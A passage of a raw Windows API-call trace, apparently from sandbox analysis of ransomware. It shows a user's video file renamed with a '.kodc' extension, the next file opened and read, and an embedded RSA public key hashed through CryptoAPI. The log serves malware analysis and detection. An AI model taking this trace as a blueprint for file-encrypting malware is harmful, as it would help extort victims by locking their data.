0x9bb7a28 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7bd8 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c340 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.097] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x9e1a, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x9e1a, lpOverlapped=0x0) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0100.097] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9e1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.097] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.098] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.098] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.098] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.098] CloseHandle (hObject=0x5cc) returned 1 [0100.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0100.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0100.103] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FV7B4Ysx7Ewbiz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fv7b4ysx7ewbiz.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FV7B4Ysx7Ewbiz.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fv7b4ysx7ewbiz.mkv.kodc")) returned 1 [0100.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.103] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.104] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b635f20, ftCreationTime.dwHighDateTime=0x1d5bc62, ftLastAccessTime.dwLowDateTime=0xc4ca0dc0, ftLastAccessTime.dwHighDateTime=0x1d5c286, ftLastWriteTime.dwLowDateTime=0xc4ca0dc0, ftLastWriteTime.dwHighDateTime=0x1d5c286, nFileSizeHigh=0x0, nFileSizeLow=0x14949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gyahlrB1X9.avi", cAlternateFileName="GYAHLR~1.AVI")) returned 1 [0100.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.105] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gyahlrB1X9.avi") returned=".avi" [0100.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gyahlrB1X9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gyahlrb1x9.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.105] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=84297) returned 1 [0100.105] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.108] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14923, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.108] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.109] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.109] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x14949, lpOverlapped=0x0) returned 1 [0100.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.110] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.110] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.111] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.111] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.111] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.111] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.111] GetLastError () returned 0x0 [0100.111] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.111] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.111] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.111] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.111] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.111] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14950) returned 0x9bb8968 [0100.112] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c340 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c388 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bd8 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.112] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7bd8 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7bc0 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bd8 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7bc0 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.113] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.113] GetCurrentThreadId () returned 0x42c [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba65d8 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.113] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.114] GetCurrentThreadId () returned 0x42c [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7bc0 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.115] RtlAllocateHeap 